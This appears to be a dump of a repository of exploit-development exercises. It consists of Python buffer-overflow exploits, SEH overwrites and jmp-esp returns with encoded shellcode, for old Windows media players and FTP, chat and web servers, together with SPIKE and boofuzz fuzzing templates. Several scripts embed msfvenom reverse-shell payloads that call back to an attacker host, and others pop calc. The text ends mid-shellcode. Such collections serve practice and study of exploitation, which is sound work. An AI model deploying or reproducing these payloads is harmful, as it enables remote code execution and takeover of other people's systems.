├── BlazeDVD 5 Professional └── exploit.py ├── DVDx Player ├── crash.py └── exploit.py ├── Easy CD DVD └── exploit.py ├── Easy Chat Server 3.1 └── exploit.py ├── Easy File Management Web Server 5.3 ├── exploit.spk └── post-request.txt ├── Easy File Sharing FTP Server 3.5 ├── boofuzz.py └── fuzz.spk ├── Easy File Sharing Web Server 7.2 └── exploit.py ├── Easy RM to MP3 Converter 2.7.3.7 └── exploit.py ├── Eureka └── exploit.py ├── FreeFTP 1.0.8 ├── boofuzz.py ├── exploit.py └── fuzz.py ├── FreeFloat └── exploit.py ├── KarjaSoft Sami FTP Server 2.0.1 ├── boofuzz.py └── exploit.py ├── KnFTP Server 1.0.0 └── exploit.py ├── Kolibri v2.0 HTTP Server ├── exploit.py └── fuzz ├── Millenium MP3 Studio ├── crash.py └── exploit.py ├── Minialic HTTP └── boofuzz.py ├── Minishare ├── exploit.py └── fuzz ├── ProSysInfo TFTP Server TFTPDWIN 0.4.2 └── fuzz.py ├── QuickZip 4.60 ├── explanation └── exploit.py ├── R v3.4.4 └── exploit.py ├── README.md ├── Ricoh DC Software DL-10 FTP Server └── boofuzz.py ├── SolarFTP └── fuzz.py ├── Soritong MP3 Player 1.0 ├── exploit.py └── payload.py ├── Vulnserver ├── gmon.py ├── others ├── trun-exploit.py └── trun-fuzz.py └── Xitami Webserver 2.5 ├── exploit.py └── fuzz /BlazeDVD 5 Professional/exploit.py: -------------------------------------------------------------------------------- 1 | file = "exploit.plf" 2 | 3 | offset = "A"*608 4 | nseh = "\xeb\x1e\x90\x90" 5 | seh = "\x34\x31\x02\x64" 6 | nops = "\x90" * 24 7 | 8 | calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" + 9 | "\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" + 10 | "\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" + 11 | "\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" + 12 | "\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" + 13 | "\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" + 14 | "\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" + 15 | "\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" + 16 | 
"\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" + 17 | "\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" + 18 | "\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" + 19 | "\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" + 20 | "\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" + 21 | "\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" + 22 | "\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" + 23 | "\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" + 24 | "\x63\x03\x6b") 25 | 26 | buffer = offset + nseh +seh + nops + calc 27 | 28 | f = open(file,'w') 29 | f.write(buffer) 30 | f.close() 31 | -------------------------------------------------------------------------------- /DVDx Player/crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | filename = "kalisa.plf" 4 | 5 | #buffer = "A" * 1000 6 | 7 | f = open(filename, 'w') 8 | f.write(buffer) 9 | f.close() 10 | -------------------------------------------------------------------------------- /DVDx Player/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | filename = "kalisa-final.plf" 4 | 5 | offset = "A" * 608 6 | nextSEH = "\xeb\x06\x90\x90" #breakpoint 7 | # 0x61602ADB 8 | SEH = "\xDB\x2A\x60\x61" #pop-pop-ret from EPG.dll 9 | # msfvenom --platform windows -a x86 -p windows/shell_reverse_tcp LHOST=192.168.1.17 LPORT=9999 -e x86/shikata_ga_nai -b '\x00\x0A\x0D\x1A' -f python -v shellcode 10 | shellcode = "" 11 | shellcode += "\xba\x1e\xfe\x32\xc4\xda\xce\xd9\x74\x24\xf4\x5f" 12 | shellcode += "\x33\xc9\xb1\x52\x31\x57\x12\x83\xef\xfc\x03\x49" 13 | shellcode += "\xf0\xd0\x31\x89\xe4\x97\xba\x71\xf5\xf7\x33\x94" 14 | shellcode += "\xc4\x37\x27\xdd\x77\x88\x23\xb3\x7b\x63\x61\x27" 15 | shellcode += "\x0f\x01\xae\x48\xb8\xac\x88\x67\x39\x9c\xe9\xe6" 16 | shellcode += "\xb9\xdf\x3d\xc8\x80\x2f\x30\x09\xc4\x52\xb9\x5b" 17 
| shellcode += "\x9d\x19\x6c\x4b\xaa\x54\xad\xe0\xe0\x79\xb5\x15" 18 | shellcode += "\xb0\x78\x94\x88\xca\x22\x36\x2b\x1e\x5f\x7f\x33" 19 | shellcode += "\x43\x5a\xc9\xc8\xb7\x10\xc8\x18\x86\xd9\x67\x65" 20 | shellcode += "\x26\x28\x79\xa2\x81\xd3\x0c\xda\xf1\x6e\x17\x19" 21 | shellcode += "\x8b\xb4\x92\xb9\x2b\x3e\x04\x65\xcd\x93\xd3\xee" 22 | shellcode += "\xc1\x58\x97\xa8\xc5\x5f\x74\xc3\xf2\xd4\x7b\x03" 23 | shellcode += "\x73\xae\x5f\x87\xdf\x74\xc1\x9e\x85\xdb\xfe\xc0" 24 | shellcode += "\x65\x83\x5a\x8b\x88\xd0\xd6\xd6\xc4\x15\xdb\xe8" 25 | shellcode += "\x14\x32\x6c\x9b\x26\x9d\xc6\x33\x0b\x56\xc1\xc4" 26 | shellcode += "\x6c\x4d\xb5\x5a\x93\x6e\xc6\x73\x50\x3a\x96\xeb" 27 | shellcode += "\x71\x43\x7d\xeb\x7e\x96\xd2\xbb\xd0\x49\x93\x6b" 28 | shellcode += "\x91\x39\x7b\x61\x1e\x65\x9b\x8a\xf4\x0e\x36\x71" 29 | shellcode += "\x9f\xf0\x6f\x78\x4e\x99\x6d\x7a\x57\x56\xfb\x9c" 30 | shellcode += "\xfd\x78\xad\x37\x6a\xe0\xf4\xc3\x0b\xed\x22\xae" 31 | shellcode += "\x0c\x65\xc1\x4f\xc2\x8e\xac\x43\xb3\x7e\xfb\x39" 32 | shellcode += "\x12\x80\xd1\x55\xf8\x13\xbe\xa5\x77\x08\x69\xf2" 33 | shellcode += "\xd0\xfe\x60\x96\xcc\x59\xdb\x84\x0c\x3f\x24\x0c" 34 | shellcode += "\xcb\xfc\xab\x8d\x9e\xb9\x8f\x9d\x66\x41\x94\xc9" 35 | shellcode += "\x36\x14\x42\xa7\xf0\xce\x24\x11\xab\xbd\xee\xf5" 36 | shellcode += "\x2a\x8e\x30\x83\x32\xdb\xc6\x6b\x82\xb2\x9e\x94" 37 | shellcode += "\x2b\x53\x17\xed\x51\xc3\xd8\x24\xd2\xf3\x92\x64" 38 | shellcode += "\x73\x9c\x7a\xfd\xc1\xc1\x7c\x28\x05\xfc\xfe\xd8" 39 | shellcode += "\xf6\xfb\x1f\xa9\xf3\x40\x98\x42\x8e\xd9\x4d\x64" 40 | shellcode += "\x3d\xd9\x47" 41 | 42 | buffer = offset + nextSEH + SEH + "\x90" * 20 + shellcode 43 | 44 | f = open(filename, 'w') 45 | f.write(buffer) 46 | f.close() 47 | -------------------------------------------------------------------------------- /Easy CD DVD/exploit.py: -------------------------------------------------------------------------------- 1 | filename = "kalisa.txt" 2 | 3 | offset = 
"A"*1008 4 | nseh = "\xeb\x06\x90\x90" 5 | seh = "\xFB\x07\x01\x10" #Skinmagic.dll pop-pop-ret 6 | nops = "\x90"*24 7 | 8 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.18 LPORT=5555 --platform windows -a x86 -b "\x00\x0a\x0d" -f python -v shellcode 9 | 10 | shellcode = "" 11 | shellcode += "\xdd\xc0\xba\x86\x95\x98\xc4\xd9\x74\x24\xf4\x5e" 12 | shellcode += "\x2b\xc9\xb1\x52\x83\xc6\x04\x31\x56\x13\x03\xd0" 13 | shellcode += "\x86\x7a\x31\x20\x40\xf8\xba\xd8\x91\x9d\x33\x3d" 14 | shellcode += "\xa0\x9d\x20\x36\x93\x2d\x22\x1a\x18\xc5\x66\x8e" 15 | shellcode += "\xab\xab\xae\xa1\x1c\x01\x89\x8c\x9d\x3a\xe9\x8f" 16 | shellcode += "\x1d\x41\x3e\x6f\x1f\x8a\x33\x6e\x58\xf7\xbe\x22" 17 | shellcode += "\x31\x73\x6c\xd2\x36\xc9\xad\x59\x04\xdf\xb5\xbe" 18 | shellcode += "\xdd\xde\x94\x11\x55\xb9\x36\x90\xba\xb1\x7e\x8a" 19 | shellcode += "\xdf\xfc\xc9\x21\x2b\x8a\xcb\xe3\x65\x73\x67\xca" 20 | shellcode += "\x49\x86\x79\x0b\x6d\x79\x0c\x65\x8d\x04\x17\xb2" 21 | shellcode += "\xef\xd2\x92\x20\x57\x90\x05\x8c\x69\x75\xd3\x47" 22 | shellcode += "\x65\x32\x97\x0f\x6a\xc5\x74\x24\x96\x4e\x7b\xea" 23 | shellcode += "\x1e\x14\x58\x2e\x7a\xce\xc1\x77\x26\xa1\xfe\x67" 24 | shellcode += "\x89\x1e\x5b\xec\x24\x4a\xd6\xaf\x20\xbf\xdb\x4f" 25 | shellcode += "\xb1\xd7\x6c\x3c\x83\x78\xc7\xaa\xaf\xf1\xc1\x2d" 26 | shellcode += "\xcf\x2b\xb5\xa1\x2e\xd4\xc6\xe8\xf4\x80\x96\x82" 27 | shellcode += "\xdd\xa8\x7c\x52\xe1\x7c\xd2\x02\x4d\x2f\x93\xf2" 28 | shellcode += "\x2d\x9f\x7b\x18\xa2\xc0\x9c\x23\x68\x69\x36\xde" 29 | shellcode += "\xfb\x56\x6f\xe1\xe9\x3e\x72\xe1\x18\x0c\xfb\x07" 30 | shellcode += "\x48\x62\xaa\x90\xe5\x1b\xf7\x6a\x97\xe4\x2d\x17" 31 | shellcode += "\x97\x6f\xc2\xe8\x56\x98\xaf\xfa\x0f\x68\xfa\xa0" 32 | shellcode += "\x86\x77\xd0\xcc\x45\xe5\xbf\x0c\x03\x16\x68\x5b" 33 | shellcode += "\x44\xe8\x61\x09\x78\x53\xd8\x2f\x81\x05\x23\xeb" 34 | shellcode += "\x5e\xf6\xaa\xf2\x13\x42\x89\xe4\xed\x4b\x95\x50" 35 | shellcode += 
"\xa2\x1d\x43\x0e\x04\xf4\x25\xf8\xde\xab\xef\x6c" 36 | shellcode += "\xa6\x87\x2f\xea\xa7\xcd\xd9\x12\x19\xb8\x9f\x2d" 37 | shellcode += "\x96\x2c\x28\x56\xca\xcc\xd7\x8d\x4e\xfc\x9d\x8f" 38 | shellcode += "\xe7\x95\x7b\x5a\xba\xfb\x7b\xb1\xf9\x05\xf8\x33" 39 | shellcode += "\x82\xf1\xe0\x36\x87\xbe\xa6\xab\xf5\xaf\x42\xcb" 40 | shellcode += "\xaa\xd0\x46" 41 | 42 | buffer = offset + nseh + seh + nops + shellcode 43 | 44 | f = open(filename,'w') 45 | f.write(buffer) 46 | f.close() 47 | -------------------------------------------------------------------------------- /Easy Chat Server 3.1/exploit.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | ip = "192.168.1.9" 4 | port = 80 5 | 6 | # bad chars for het request \x00\x20\x0a\x0d 7 | 8 | 9 | offset = "A"*(221-4) 10 | nseh = "\xeb\x06\x90\x90" 11 | seh = "\xe7\x0f\x01\x10" #0x10010FE7 SSLEAY32.dll 12 | junk = "\x90"*16 13 | 14 | # msfvenom -p windows/exec cmd=calc.exdows -a x86 -e x86/alpha_mixed -b \x00\x0a\x0d\x20 -f python -v calc 15 | calc = "" 16 | calc += "\xdb\xd1\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49" 17 | calc += "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37" 18 | calc += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" 19 | calc += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" 20 | calc += "\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x58\x68\x4c\x42" 21 | calc += "\x45\x50\x63\x30\x65\x50\x35\x30\x4d\x59\x68\x65\x44" 22 | calc += "\x71\x4f\x30\x75\x34\x4c\x4b\x52\x70\x34\x70\x6c\x4b" 23 | calc += "\x31\x42\x46\x6c\x4e\x6b\x66\x32\x45\x44\x6e\x6b\x62" 24 | calc += "\x52\x65\x78\x64\x4f\x6d\x67\x71\x5a\x44\x66\x45\x61" 25 | calc += "\x79\x6f\x4e\x4c\x47\x4c\x51\x71\x71\x6c\x76\x62\x46" 26 | calc += "\x4c\x61\x30\x6f\x31\x38\x4f\x46\x6d\x76\x61\x48\x47" 27 | calc += "\x6b\x52\x49\x62\x76\x32\x62\x77\x4c\x4b\x63\x62\x52" 28 | calc += "\x30\x4e\x6b\x31\x5a\x35\x6c\x4c\x4b\x50\x4c\x52\x31" 29 | calc += 
"\x32\x58\x4d\x33\x50\x48\x45\x51\x4b\x61\x76\x31\x6e" 30 | calc += "\x6b\x66\x39\x57\x50\x43\x31\x4e\x33\x4e\x6b\x53\x79" 31 | calc += "\x67\x68\x58\x63\x65\x6a\x63\x79\x4c\x4b\x30\x34\x6e" 32 | calc += "\x6b\x36\x61\x78\x56\x45\x61\x79\x6f\x6e\x4c\x79\x51" 33 | calc += "\x78\x4f\x46\x6d\x75\x51\x5a\x67\x64\x78\x49\x70\x44" 34 | calc += "\x35\x7a\x56\x73\x33\x61\x6d\x79\x68\x37\x4b\x61\x6d" 35 | calc += "\x77\x54\x72\x55\x6a\x44\x42\x78\x4c\x4b\x72\x78\x77" 36 | calc += "\x54\x65\x51\x7a\x73\x61\x76\x4e\x6b\x74\x4c\x70\x4b" 37 | calc += "\x4c\x4b\x52\x78\x55\x4c\x37\x71\x4b\x63\x4e\x6b\x56" 38 | calc += "\x64\x6c\x4b\x77\x71\x48\x50\x4e\x69\x62\x64\x34\x64" 39 | calc += "\x36\x44\x61\x4b\x73\x6b\x75\x31\x33\x69\x71\x4a\x76" 40 | calc += "\x31\x69\x6f\x4d\x30\x43\x6f\x31\x4f\x32\x7a\x4e\x6b" 41 | calc += "\x67\x62\x4a\x4b\x6e\x6d\x53\x6d\x53\x5a\x43\x31\x4e" 42 | calc += "\x6d\x6e\x65\x68\x32\x53\x30\x65\x50\x35\x50\x66\x30" 43 | calc += "\x70\x68\x65\x61\x6c\x4b\x50\x6f\x6b\x37\x59\x6f\x48" 44 | calc += "\x55\x6d\x6b\x38\x70\x6c\x75\x4e\x42\x43\x66\x52\x48" 45 | calc += "\x59\x36\x6d\x45\x4d\x6d\x6d\x4d\x79\x6f\x68\x55\x75" 46 | calc += "\x6c\x43\x36\x43\x4c\x64\x4a\x4d\x50\x4b\x4b\x39\x70" 47 | calc += "\x70\x75\x43\x35\x4d\x6b\x70\x47\x66\x73\x51\x62\x30" 48 | calc += "\x6f\x70\x6a\x45\x50\x71\x43\x59\x6f\x38\x55\x63\x53" 49 | calc += "\x33\x51\x42\x4c\x52\x43\x64\x6e\x51\x75\x63\x48\x43" 50 | calc += "\x55\x43\x30\x41\x41" 51 | 52 | 53 | buffer = offset + nseh + seh + junk + calc 54 | 55 | req = "GET /chat.ghp?username=" + buffer + "&password=&room=1&sex=2 HTTP/1.1\r\n" 56 | req += "User-Agent: Mozilla/4.0\r\n" 57 | req += "Host: 192.168.1.9:80\r\n" 58 | req += "Accept-Language: en-us\r\n" 59 | req += "Accept-Encoding: gzip, deflate\r\n" 60 | req += "Referer: http://192.168.1.136\r\n" 61 | req += "Connection: Keep-Alive\r\n\r\n" 62 | 63 | 64 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 65 | connect = s.connect((ip,port)) 66 | s.send(req) 67 | 
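s.recv(1024)
s.close()
-------------------------------------------------------------------------------- /Easy File Management Web Server 5.3/exploit.spk: --------------------------------------------------------------------------------
// SPIKE script: POST /forum.ghp with four fuzzed cookie fields (UserID, PassWD,
// frmUserName, frmUserPass); everything else in the request is static. The
// application carries the login name and password in plain cookies (see the
// captured post-request.txt), which is why the cookie is the fuzzed surface.
// NOTE(review): s_string() emits no line terminator, so as written the header
// calls below are sent as one run of text; each presumably needs a trailing
// "\r\n" like the two trailing s_string("\r\n") calls -- confirm before
// trusting a "no crash" result from this template.
s_string("POST /forum.ghp HTTP/1.1");
s_string("Host: ");
s_string("192.168.1.6");
s_string("Connection: keep-alive");
s_string("Content-Length: 64");
s_string("Cache-Control: max-age=0");
s_string("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
s_string("Origin: http://192.168.1.6");
s_string("Upgrade-Insecure-Requests: 1");
s_string("User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36");
s_string("Content-Type: application/x-www-form-urlencoded");
s_string("Referer: http://192.168.1.6/");
s_string("Accept-Encoding: gzip, deflate");
s_string("Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4");
s_string("Cookie: SESSIONID=29777; ");
s_string("UserID=");
s_string_variable("aaa");
s_string("; PassWD=");  // fixed: the literal was missing its quotes in the original
s_string_variable("aaa");
s_string("; frmUserName=");
s_string_variable("aaa");
s_string("; frmUserPass=");
s_string_variable("aa");
s_string("; rememberPass=202%2C197%2C208%2C215%2C201");
s_string("\r\n");
s_string("\r\n");


s_block_start("post");
s_string("frmLogin=true&frmUserName=tsdfg&frmUserPass=sdgfs&login=Login%21\r\n");  // 64 bytes before the CRLF, matching Content-Length
s_block_end("post");
sleep(1);
-------------------------------------------------------------------------------- /Easy File Management Web Server 5.3/post-request.txt: --------------------------------------------------------------------------------
POST /forum.ghp HTTP/1.1
Host: 192.168.1.6
Connection: keep-alive
Content-Length: 64
Cache-Control: max-age=0
Accept: 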
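text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.6
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.6/
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: SESSIONID=29777; UserID=admin; PassWD=admin; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201

-------------------------------------------------------------------------------- /Easy File Sharing FTP Server 3.5/boofuzz.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# boofuzz template for Easy File Sharing FTP Server 3.5: logs in with a fixed
# anonymous USER and fuzzes the PASS argument. (The original header wrongly
# described this file as a Solar FTP 2.1.1 PASV template.)

from boofuzz import *

host = "192.168.1.10"
port = 21

def main():
    """Build the USER -> PASS request graph and fuzz it against host:port."""
    session = Session(target=Target(connection=SocketConnection(host, port, proto='tcp')))

    # USER itself is static; s_delim is fuzzable, so only the separator is mutated here.
    s_initialize("user")
    s_static("USER")
    s_delim(" ")
    s_static("anonymous")
    s_static("\r\n")

    # PASS carries the fuzzed string.
    s_initialize("pass")
    s_static("PASS")
    s_delim(" ")
    s_string("test")
    s_static("\r\n")

    # PASS is only meaningful after USER, so chain the two nodes.
    session.connect(s_get("user"))
    session.connect(s_get("user"), s_get("pass"))

    session.fuzz()
if __name__ == "__main__":
    main()
-------------------------------------------------------------------------------- /Easy File Sharing FTP Server 3.5/fuzz.spk: --------------------------------------------------------------------------------
// SPIKE counterpart of boofuzz.py: anonymous USER, then a fuzzed PASS argument.
s_string("USER");
s_string(" ");
s_string("anonymous");
s_string("\r\n");
s_readline();
s_string("PASS");
s_string(" ");  // fixed: the original sent " ," so every PASS argument began with a stray comma
s_string_variable("kalisa");
s_string("\r\n");
s_readline();
-------------------------------------------------------------------------------- /Easy File Sharing Web Server 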
7.2/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket,sys 4 | 5 | host = "192.168.1.4" 6 | port = 80 7 | 8 | shellcode = ( 9 | "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 10 | "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 11 | "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" 12 | "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 13 | "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" 14 | "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" 15 | "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" 16 | "\x1c\x39\xbd" 17 | ) 18 | 19 | offset = "A"*4061 20 | nseh = "\xeb\x06\x90\x90" 21 | seh = "\x38\x88\x01\x10" #0x10018838 22 | junk = "D"*600 23 | 24 | buffer = offset + nseh + seh + "\x90"*8 + shellcode + "\x90"*8 + junk 25 | 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | s.connect((host,port)) 28 | s.send("GET " + buffer + " HTTP/1.0\r\n\r\n") 29 | s.close() 30 | -------------------------------------------------------------------------------- /Easy RM to MP3 Converter 2.7.3.7/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # shellcode 4 | 5 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A" -f python -v payload 6 | buf = "" 7 | buf += "\xbd\xbb\x6d\x64\xfa\xd9\xc8\xd9\x74\x24\xf4\x5a\x33" 8 | buf += "\xc9\xb1\x31\x31\x6a\x13\x83\xea\xfc\x03\x6a\xb4\x8f" 9 | buf += "\x91\x06\x22\xcd\x5a\xf7\xb2\xb2\xd3\x12\x83\xf2\x80" 10 | buf += "\x57\xb3\xc2\xc3\x3a\x3f\xa8\x86\xae\xb4\xdc\x0e\xc0" 11 | buf += "\x7d\x6a\x69\xef\x7e\xc7\x49\x6e\xfc\x1a\x9e\x50\x3d" 12 | buf += "\xd5\xd3\x91\x7a\x08\x19\xc3\xd3\x46\x8c\xf4\x50\x12" 13 | buf += "\x0d\x7e\x2a\xb2\x15\x63\xfa\xb5\x34\x32\x71\xec\x96" 14 | buf += "\xb4\x56\x84\x9e\xae\xbb\xa1\x69\x44\x0f\x5d\x68\x8c" 15 | buf += "\x5e\x9e\xc7\xf1\x6f\x6d\x19\x35\x57\x8e\x6c\x4f\xa4" 
16 | buf += "\x33\x77\x94\xd7\xef\xf2\x0f\x7f\x7b\xa4\xeb\x7e\xa8" 17 | buf += "\x33\x7f\x8c\x05\x37\x27\x90\x98\x94\x53\xac\x11\x1b" 18 | buf += "\xb4\x25\x61\x38\x10\x6e\x31\x21\x01\xca\x94\x5e\x51" 19 | buf += "\xb5\x49\xfb\x19\x5b\x9d\x76\x40\x31\x60\x04\xfe\x77" 20 | buf += "\x62\x16\x01\x27\x0b\x27\x8a\xa8\x4c\xb8\x59\x8d\xa3" 21 | buf += "\xf2\xc0\xa7\x2b\x5b\x91\xfa\x31\x5c\x4f\x38\x4c\xdf" 22 | buf += "\x7a\xc0\xab\xff\x0e\xc5\xf0\x47\xe2\xb7\x69\x22\x04" 23 | buf += "\x64\x89\x67\x67\xeb\x19\xeb\x46\x8e\x99\x8e\x96" 24 | 25 | filename="exploit.m3u" 26 | 27 | buffer = "A"*26075 28 | # 77E9F8F7 29 | buffer += "\xF7\xF8\xE9\x77" 30 | buffer += "\x90"*25 31 | buffer += buf 32 | 33 | textfile= open(filename,'w') 34 | textfile.write(buffer) 35 | textfile.close() 36 | -------------------------------------------------------------------------------- /Eureka/exploit.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | offset = "A" * 710 4 | ret = "\x10\xB3\x45\x7E" #0x7E45B310 USER32.dll jmp esp 5 | nops = "\x90" * 2000 6 | 7 | egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" 8 | "\x77\x30\x30\x74" # this is the egg: w00t 9 | "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") 10 | 11 | calc = ("\xbb\x34\x46\x73\x3a\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9" + 12 | "\xb1\x33\x31\x5a\x12\x83\xea\xfc\x03\x6e\x48\x91\xcf\x72" + 13 | "\xbc\xdc\x30\x8a\x3d\xbf\xb9\x6f\x0c\xed\xde\xe4\x3d\x21" + 14 | "\x94\xa8\xcd\xca\xf8\x58\x45\xbe\xd4\x6f\xee\x75\x03\x5e" + 15 | "\xef\xbb\x8b\x0c\x33\xdd\x77\x4e\x60\x3d\x49\x81\x75\x3c" + 16 | "\x8e\xff\x76\x6c\x47\x74\x24\x81\xec\xc8\xf5\xa0\x22\x47" + 17 | "\x45\xdb\x47\x97\x32\x51\x49\xc7\xeb\xee\x01\xff\x80\xa9" + 18 | "\xb1\xfe\x45\xaa\x8e\x49\xe1\x19\x64\x48\x23\x50\x85\x7b" + 19 | "\x0b\x3f\xb8\xb4\x86\x41\xfc\x72\x79\x34\xf6\x81\x04\x4f" + 20 | "\xcd\xf8\xd2\xda\xd0\x5a\x90\x7d\x31\x5b\x75\x1b\xb2\x57" + 21 | 
"\x32\x6f\x9c\x7b\xc5\xbc\x96\x87\x4e\x43\x79\x0e\x14\x60" + 22 | "\x5d\x4b\xce\x09\xc4\x31\xa1\x36\x16\x9d\x1e\x93\x5c\x0f" + 23 | "\x4a\xa5\x3e\x45\x8d\x27\x45\x20\x8d\x37\x46\x02\xe6\x06" + 24 | "\xcd\xcd\x71\x97\x04\xaa\x80\x66\x95\x26\x14\xd1\x4c\x0b" + 25 | "\x78\xe2\xba\x4f\x85\x61\x4f\x2f\x72\x79\x3a\x2a\x3e\x3d" + 26 | "\xd6\x46\x2f\xa8\xd8\xf5\x50\xf9\xba\x98\xc2\x61\x13\x3f" + 27 | "\x63\x03\x6b") 28 | 29 | 30 | payload = "-ERR " + offset + ret + egghunter + nops + "w00tw00t" + calc 31 | 32 | # set up listener on port 110 33 | try: 34 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 35 | s.bind(('', 110)) 36 | s.listen(1) 37 | print ("[*] Listening on port 110.") 38 | print ("[*] Have someone connect to you.") 39 | print ("[*] Type -c to exit.") 40 | conn, addr = s.accept() 41 | print '[*] Received connection from: ', addr 42 | 43 | while 1: 44 | conn.send(payload) 45 | conn.close() 46 | except: 47 | print ("[*] Connection issue!") 48 | -------------------------------------------------------------------------------- /FreeFTP 1.0.8/boofuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from boofuzz import * 3 | from boofuzz import pedrpc 4 | 5 | host = "192.168.1.9" 6 | port = 21 7 | 8 | def main(): 9 | session = Session(target = Target(connection = SocketConnection(host, port, proto='tcp'))) 10 | 11 | s_initialize("user") 12 | s_static("USER") 13 | s_delim(" ") 14 | s_static("anonymous") 15 | s_static("\r\n") 16 | 17 | s_initialize("pass") 18 | s_static("PASS") 19 | s_delim(" ") 20 | s_string("FUZZ") 21 | s_static("\r\n") 22 | 23 | session.connect(s_get("user")) 24 | session.connect(s_get("user"), s_get("pass")) 25 | 26 | session.fuzz() 27 | if __name__ == "__main__": 28 | main() 29 | -------------------------------------------------------------------------------- /FreeFTP 1.0.8/exploit.py: -------------------------------------------------------------------------------- 1 | import 
socket,sys 2 | 3 | host = "192.168.1.10" 4 | port= 21 5 | 6 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.17 LPORT=4444 -f c -v shell -b '\x0a\x0d' -e x86/shikata_ga_nai 7 | shell = ("\xda\xc6\xd9\x74\x24\xf4\xbf\x92\x9d\x35\x91\x58\x2b\xc9\xb1\x52\x31\x78\x17\x03\x78\x17\x83\x52\x99\xd7\x64\xae\x4a\x95\x87\x4e\x8b\xfa\x0e\xab\xba\x3a\x74\xb8\xed\x8a\xfe\xec\x01\x60\x52\x04\x91\x04\x7b\x2b\x12\xa2\x5d\x02\xa3\x9f\x9e\x05\x27\xe2\xf2\xe5\x16\x2d\x07\xe4\x5f\x50\xea\xb4\x08\x1e\x59\x28\x3c\x6a\x62\xc3\x0e\x7a\xe2\x30\xc6\x7d\xc3\xe7\x5c\x24\xc3\x06\xb0\x5c\x4a\x10\xd5\x59\x04\xab\x2d\x15\x97\x7d\x7c\xd6\x34\x40\xb0\x25\x44\x85\x77\xd6\x33\xff\x8b\x6b\x44\xc4\xf6\xb7\xc1\xde\x51\x33\x71\x3a\x63\x90\xe4\xc9\x6f\x5d\x62\x95\x73\x60\xa7\xae\x88\xe9\x46\x60\x19\xa9\x6c\xa4\x41\x69\x0c\xfd\x2f\xdc\x31\x1d\x90\x81\x97\x56\x3d\xd5\xa5\x35\x2a\x1a\x84\xc5\xaa\x34\x9f\xb6\x98\x9b\x0b\x50\x91\x54\x92\xa7\xd6\x4e\x62\x37\x29\x71\x93\x1e\xee\x25\xc3\x08\xc7\x45\x88\xc8\xe8\x93\x1f\